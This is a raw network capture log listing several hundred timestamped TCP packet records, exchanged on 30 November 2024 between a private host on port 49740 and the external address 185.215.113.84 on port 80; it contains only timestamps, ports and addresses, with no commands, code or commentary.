                                                                                                                  Nov 30, 2024 01:55:26.646636009 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.646686077 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.646800041 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.646862984 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.647488117 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.647536039 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.647639036 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.647684097 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.648358107 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.648442030 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.648531914 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.648576021 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.649240971 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.649280071 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.649398088 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.649435043 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.650111914 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.650151968 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.650259972 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.650298119 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.650986910 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.651026011 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.651150942 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.651186943 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.651906013 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.651941061 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.652029991 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.652070045 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.652740955 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.652781963 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.652896881 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.652931929 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.653604031 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.653640032 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.653758049 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.653793097 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.654488087 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.654526949 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.654625893 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.654666901 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.655363083 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.655400991 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.655499935 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.655539036 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.656238079 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.656279087 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.656394958 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.656436920 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.657144070 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.657187939 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.657272100 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.657313108 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.657983065 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.658024073 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.658124924 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.658166885 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.813754082 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.813808918 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.813901901 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.813949108 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.813958883 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.814002991 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.814202070 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.814249039 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.814866066 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.814909935 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.814984083 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.815021038 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.815715075 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.815763950 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.815834999 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.815872908 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.816338062 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.816395044 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.816474915 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.816514969 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.817198038 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.817246914 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.817337990 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.817374945 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.818088055 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.818131924 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.818231106 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.818272114 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.818973064 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.819017887 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.819119930 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.819158077 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.819839954 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.819885015 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.820004940 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.820044041 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.820725918 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.820781946 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.820868969 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.820913076 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.821582079 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.821629047 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.821737051 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.821783066 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.822472095 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.822520018 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.822606087 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.822647095 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.823331118 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.823370934 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.823486090 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.823532104 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.824208021 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.824250937 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.824373007 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.824413061 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.825126886 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.825167894 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.825270891 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.825315952 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.825965881 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.826015949 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.826105118 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.826145887 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.826828957 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.826873064 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.826984882 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.827024937 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.827702999 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.827744961 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.827857018 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.827918053 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.828608990 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.828656912 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.828732014 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.828772068 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.829444885 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.829490900 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.829606056 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.829644918 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.830327034 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.830379009 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.830467939 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.830509901 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.831196070 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.831242085 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.831336975 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.831379890 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.832066059 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.832112074 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.832202911 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.832250118 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.832935095 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.832983017 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.833101034 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.833139896 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.833862066 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.833908081 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.833980083 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.834024906 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.834758043 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.834820986 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.834899902 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.834939957 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.835627079 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.835674047 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.835786104 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.835823059 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.836467981 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.836519957 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.836606979 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.836651087 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.837373018 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.837419987 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.837505102 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.837544918 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.838224888 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.838279963 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.838354111 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.838392973 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.839087009 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.839133978 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.839237928 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.839282990 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.839967012 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.840009928 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.840104103 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.840145111 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.840831041 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.840877056 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.840975046 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.841016054 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.841710091 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.841753006 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.841885090 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.842058897 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.842590094 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.842636108 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.842739105 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.842776060 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.843441010 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.843496084 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.843579054 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.843616962 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.844316959 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.844357014 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.844476938 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.844516993 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.845195055 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.845240116 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.845346928 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.845391989 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.846090078 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.846146107 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.846232891 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.846270084 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.846946001 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.846987963 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.847096920 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.847136021 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.847831011 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.847884893 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.847968102 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.848011017 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.848699093 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.848742008 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.848858118 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.848901033 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.849574089 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.849636078 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.849711895 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.849756002 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.850428104 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.850477934 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.850589991 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.850621939 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.851306915 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.851351976 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.851459026 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.851501942 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.852221966 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.852267981 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.852334023 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.852375984 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.853060961 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.853104115 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.853219032 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.853262901 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.853924036 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.853970051 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.854079008 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.854116917 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.854815006 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.854859114 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.854965925 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.855009079 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.855688095 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.855727911 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.855811119 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.855850935 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.856574059 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.856623888 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.856740952 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.856781006 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.857441902 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.857491970 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.857582092 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.857618093 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.858305931 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.858350992 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.858434916 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.858475924 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.859188080 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.859230995 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:26.859296083 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:26.859337091 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.015069962 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.015127897 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.015285015 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.015322924 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.015461922 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.015501022 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.015743971 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.015779972 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.016356945 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.016402006 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.016529083 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.016568899 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.017163038 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.017201900 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.017477989 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.017522097 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.017602921 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.017640114 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.018340111 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.018425941 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.018492937 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.018537045 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.019196987 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.019241095 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.019356966 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.019397974 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.020291090 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.020303965 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.020342112 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.020948887 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.020991087 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.021089077 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.021126032 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.021836996 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.021878958 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.021966934 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.022010088 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.022706032 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:27.022748947 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:27.022855997 CET8049740185.215.113.84192.168.2.4
